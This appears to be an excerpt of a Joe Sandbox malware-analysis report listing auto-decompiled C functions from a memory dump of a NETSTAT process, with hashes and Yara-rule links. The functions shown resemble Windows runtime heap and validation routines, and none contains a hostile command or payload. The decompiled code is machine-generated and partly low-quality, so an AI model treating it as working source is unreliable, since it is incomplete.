0x02f38fc3
0x02f38fd6

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55abf19bf4484b18ba5999a48c71f6ae09a2b7d849150e2e41890443f7ce178
Instruction ID: f9b21909f17325134c2f587e689d3c9c368f7613bd6224d168b345d5e971fbae
Opcode Fuzzy Hash: a55abf19bf4484b18ba5999a48c71f6ae09a2b7d849150e2e41890443f7ce178
Instruction Fuzzy Hash: 25013C74A4120CAFDB00EFB8D545AAEB7B5EF48340F10845AF905EB381EA34EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02F21608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E02F21608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x2f5d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E02E87D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x02f21608
0x02f21617
0x02f2161d
0x02f21625
0x02f21628
0x02f2162b
0x02f21636
0x02f21648
0x02f21638
0x02f21641
0x02f21641
0x02f21653
0x02f21654
0x02f21656
0x02f2165b
0x02f2166e

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569941af7cd3d64f8879eaf951658e48913ee9c201a7b9c6a4b335426147b044
Instruction ID: 630bded051089c11cc3971d8bb2934a6c1933dc5759da402781483f5ea6effdc
Opcode Fuzzy Hash: 569941af7cd3d64f8879eaf951658e48913ee9c201a7b9c6a4b335426147b044
Instruction Fuzzy Hash: 36F06271E41258EFDB14EFA8D505A6FBBF4EF15300F048069B915EB381E6349910CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02E8C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E8C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02E8C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2e411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E02F388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x02e8c577
0x02e8c57d
0x02e8c581
0x02e8c5b5
0x02e8c5b9
0x02e8c5ce
0x02e8c5ce
0x02e8c5ca
0x00000000
0x02e8c5ca
0x02e8c5c4
0x02e8c5c8
0x00000000
0x00000000
0x00000000
0x02e8c5ad
0x00000000
0x02e8c5af

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a18a30eba02296435ad944f26e834ef6b0fe95d12c497279ffbd5cf5ef78c4
Instruction ID: f142925055fe2ddf1f6bf256c81639ddf3fd0beb639cd339ec333abdc8914ddf
Opcode Fuzzy Hash: e3a18a30eba02296435ad944f26e834ef6b0fe95d12c497279ffbd5cf5ef78c4
Instruction Fuzzy Hash: 00F090B29956909EDF3AA7148004B627BD49B07678F64F467F68D87641C7A4D880C670

Uniqueness

Uniqueness Score: -1.00%

Function 02EA927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02EA927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E02EAFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E02EA92C6(_t11, _t14);
				}
				return _t11;
			}

0x02ea9295
0x02ea9299
0x02ea929f
0x02ea92aa
0x02ea92ad
0x02ea92ae
0x02ea92af
0x02ea92b0
0x02ea92b4
0x02ea92bb
0x02ea92bb
0x02ea92c5

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 237b4cfb9c802dc9b5907f1b675fb746b8f715e2bbf17a2db3f4257aea61f9c5
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 33E09B323805406BDB119F55DC94F57775EDF82725F049079B5085E293C6F6ED098BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F22073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02F22073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E02F1FD22(__ecx);
				_t19 =  *0x2f5849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x2f58748; // 0x0
					if(__eflags <= 0) {
						E02F21C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x2f58724 & 0x00000004;
							if(( *0x2f58724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x2f58724; // 0x0
					return E02F18DF1(__ebx, 0xc0000374, 0x2f55890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x02f22076
0x02f22078
0x02f2207d
0x02f22083
0x02f220a4
0x02f220aa
0x02f220ac
0x02f220b7
0x02f220ba
0x02f220bc
0x02f220c9
0x02f220c9
0x02f220d0
0x02f220d2
0x00000000
0x02f220d2
0x02f220be
0x02f220c3
0x02f220c5
0x02f220c7
0x00000000
0x00000000
0x02f220c7
0x02f220bc
0x02f220d4
0x02f22085
0x02f22085
0x02f220a3
0x02f220a3

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6041a5f198c13ad58c6acf9ff036f1ec0285066e182237916838e445ea1d0eb2
Instruction ID: c26aae8ab65e3b362b2f1cf9487b633d792e2e4e861794e1c30a6800601aec15
Opcode Fuzzy Hash: 6041a5f198c13ad58c6acf9ff036f1ec0285066e182237916838e445ea1d0eb2
Instruction Fuzzy Hash: 01F0272AC112BC4ADF32AB2435013E27B91CB476D0B491845DF511B208CB3488D7CE10

Uniqueness

Uniqueness Score: -1.00%

Function 02F38D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E02F38D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x2f5d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E02E87D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x02f38d34
0x02f38d43
0x02f38d4b
0x02f38d4e
0x02f38d52
0x02f38d5c
0x02f38d6e
0x02f38d5e
0x02f38d67
0x02f38d67
0x02f38d79
0x02f38d7a
0x02f38d7c
0x02f38d81
0x02f38d94

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57dc633f9f1f0c4c3173ceeed9550a55f255d7a6020bde33399d8672115e632
Instruction ID: 0503a486d51e6b6fa746a75bdf49da570817b58ba45bad4300baaa08c6986d9a
Opcode Fuzzy Hash: c57dc633f9f1f0c4c3173ceeed9550a55f255d7a6020bde33399d8672115e632
Instruction Fuzzy Hash: AEF0BE70E4460CAFDB04EFB8D541A6EB7B4EF58340F508099FA06EB281EA38E900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02F38B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E02F38B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2f5d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E02E87D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x02f38b67
0x02f38b6f
0x02f38b72
0x02f38b7d
0x02f38b8f
0x02f38b7f
0x02f38b88
0x02f38b88
0x02f38b9a
0x02f38b9b
0x02f38b9d
0x02f38ba2
0x02f38bb5

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795b4fc2e238b3d5c0f6e673d7772178ad9abbf8f9b92249fd8780f058547d4f
Instruction ID: db76dd0fb1e450ee3b084ed5a580ff07c07b457f2014774c6b9d945196a6dbeb
Opcode Fuzzy Hash: 795b4fc2e238b3d5c0f6e673d7772178ad9abbf8f9b92249fd8780f058547d4f
Instruction Fuzzy Hash: 0BF082B0A54259ABDB00EBB8D916E6EB3B4EF04344F144499BA05DF3C1EA34E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02E64F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E64F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E02F388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E02E8C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2e41030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x02e64f2e
0x02e64f34
0x02e64f38
0x02ec0b85
0x02ec0b85
0x02ec0b89
0x02ec0b9a
0x02ec0b9a
0x02ec0b9f
0x00000000
0x02ec0b9f
0x02ec0b94
0x02ec0b98
0x00000000
0x00000000
0x00000000
0x02ec0b98
0x02e64f3e
0x02e64f48
0x00000000
0x02e64f6e
0x00000000
0x02e64f70

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724293cfc8cf9bfdd80ae693d712437d740417b99b25b46af3659fe89ae4a887
Instruction ID: cfd1d2cdf9feeaaf086b7a08c8672d84d42a7944ef5db711a0a458eff0af6319
Opcode Fuzzy Hash: 724293cfc8cf9bfdd80ae693d712437d740417b99b25b46af3659fe89ae4a887
Instruction Fuzzy Hash: FCF0BE325A2794CFD771D798C364B22B7E4AB007BCF24F569E40987920E724EC81C640

Uniqueness

Uniqueness Score: -1.00%

Function 02F38CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E02F38CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2f5d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E02E87D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x02f38ce5
0x02f38ced
0x02f38cf0
0x02f38cfb
0x02f38d0d
0x02f38cfd
0x02f38d06
0x02f38d06
0x02f38d18
0x02f38d19
0x02f38d1b
0x02f38d20
0x02f38d33

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e4583dc2b2afc65cc50897889fe87efb3a104e7252a3b50190a3c84837d138
Instruction ID: b2210fa60c625d06084b3dea6ef186f0c05630add51467c7aac9f4ea824aca8d
Opcode Fuzzy Hash: e8e4583dc2b2afc65cc50897889fe87efb3a104e7252a3b50190a3c84837d138
Instruction Fuzzy Hash: 35F0E270A44208ABCB00EBB8D945E6EB7B4EF09340F104199F916EB2C0EA34E900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02E8746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02E8746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E02E7EB70(__ecx, 0x2f579a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E02EA95D0();
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x02e8746d
0x02e8746d
0x02e8746d
0x02e87471
0x02e87488
0x02ecf92d
0x02e8748e
0x02e87491
0x02e87495
0x02ecf937
0x02ecf93a
0x02ecf94e
0x02ecf953
0x02ecf956
0x02ecf956
0x02e87495
0x00000000
0x02e87488
0x02e87473
0x02e87478
0x02e8747d
0x02e87481
0x00000000
0x02e87481
0x02e8747d
0x02e8747a
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba103b0667ae3d589ceab1e1ba01e33a22cbf044196b8b92276caf3859d42644
Instruction ID: c7587a468ce2f5d1b10866077e235f076aec8b94d87fe24d722686ba711dcd69
Opcode Fuzzy Hash: ba103b0667ae3d589ceab1e1ba01e33a22cbf044196b8b92276caf3859d42644
Instruction Fuzzy Hash: 21F0B438DC0148AADF11B7A8C940BB9FBA2AF04398F24E156E8DDAB150E7659801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02E9A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E9A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x2f57b9c; // 0x0
				_t15 = __ecx;
				_t16 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E02EAFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x02e9a44b
0x02e9a453
0x02e9a472
0x02e9a476
0x00000000
0x02e9a493
0x02e9a47a
0x02e9a47f
0x02e9a486
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6348a25a50814e57d1ba433cb6aff62b77b0c1960c9d54b9fad4c73c68bfd0f7
Instruction ID: 874b9bf70855aafc1493ebfe4e1c877267d42650a9c1fceeeb98461520c2d46d
Opcode Fuzzy Hash: 6348a25a50814e57d1ba433cb6aff62b77b0c1960c9d54b9fad4c73c68bfd0f7
Instruction Fuzzy Hash: 46E09272A81421ABD6215B18AC00FA6B39EDFD5A55F0A9435F909C7254D628DD11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02E6F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E02E6F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E02E9F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L02E84620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x02e6f35d
0x02e6f361
0x02e6f367
0x02e6f372
0x02e6f38c
0x02e6f38c
0x02e6f394

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 5f0f185a6253715edb4a1818910d606c399fa7732d353d933ab4471a2fc8a369
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: EDE0D832AC0218BBCB21A6D99D05F6ABBADDB44BA0F049195B908D7550D5789D00D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 02E7FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E7FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2e411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E02F388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E02E80050(_t14);
				}
			}

0x02e7ff66
0x02e7ff6b
0x00000000
0x02e7ff8f
0x00000000
0x02e7ff8f

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9b58261f2a37104fdd8d857f1ab1cea4bb5b2c03bf9e5af5cf8c2236b59742
Instruction ID: 6670ad34691cd01c6e3a26716aac1544fb84d182728f6484a3f59912d68a4002
Opcode Fuzzy Hash: 9b9b58261f2a37104fdd8d857f1ab1cea4bb5b2c03bf9e5af5cf8c2236b59742
Instruction Fuzzy Hash: 7CE0DFB0289204DFDB38EB53E140F25379E9B42769F19E45DF00C8BD01CF21D880C616

Uniqueness

Uniqueness Score: -1.00%

Function 02F1D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F1D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L02E6E8B0(__ecx, _a4, 0xfff);
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x02f1d38a
0x02f1d39b
0x02f1d3b1
0x00000000
0x02f1d3b6
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: edccf9155a3f623803186d3a65cc372a25abb9c283f50bde3f596ad524b6b5f2
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 91E0C2362C1204BBDB226E44CC00F79BB26DB407E1F208031FE485A690C6759C91DAC4

Uniqueness

Uniqueness Score: -1.00%

Function 02EF41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02EF41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x2f408f0);
				_t5 = E02EBD08C(__ebx, __edi, __esi);
				if( *0x2f587ec == 0) {
					E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x2f587ec == 0) {
						 *0x2f587f0 = 0x2f587ec;
						 *0x2f587ec = 0x2f587ec;
						 *0x2f587e8 = 0x2f587e4;
						 *0x2f587e4 = 0x2f587e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L02EF4248();
				}
				return E02EBD0D1(_t5);
			}

0x02ef41e8
0x02ef41ea
0x02ef41ef
0x02ef41fb
0x02ef4206
0x02ef420b
0x02ef4216
0x02ef421d
0x02ef4222
0x02ef422c
0x02ef4231
0x02ef4231
0x02ef4236
0x02ef423d
0x02ef423d
0x02ef4247

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afdbce2c2e5d00aa3e03090bcee9c9dc181196b3a90da00883dcaa6df6955bee
Instruction ID: 819143672ad00f54fcfd10880a5d37d9ee54024d4eeb33e241008ec5e858174e
Opcode Fuzzy Hash: afdbce2c2e5d00aa3e03090bcee9c9dc181196b3a90da00883dcaa6df6955bee
Instruction Fuzzy Hash: AAF015789E072CCEEBA1EFB8A500715B6A5FB443D4F00A96AA30487294D77844D0CF01

Uniqueness

Uniqueness Score: -1.00%

Function 02E9A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E9A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x2f567e4 >= 0xa) {
					if(_t5 < 0x2f56800 || _t5 >= 0x2f56900) {
						return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E02E80010(0x2f567e0, _t5);
				}
			}

0x02e9a190
0x02e9a1a6
0x02e9a1c2
0x00000000
0x00000000
0x00000000
0x02e9a192
0x02e9a192
0x02e9a19f
0x02e9a19f

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46bb1b124dbd1b7f965c5badb691555de6e44166972818813a952b53b0ee320f
Instruction ID: 52f668ed31c50e7ee91512943576e82534ef082a56014acf1cfb8d2ab46e6607
Opcode Fuzzy Hash: 46bb1b124dbd1b7f965c5badb691555de6e44166972818813a952b53b0ee320f
Instruction Fuzzy Hash: 31D02BB11E041416CB2C2B11A814B22361BEFC0750F70E81EF31F8B6A0ED54CCD4C918

Uniqueness

Uniqueness Score: -1.00%

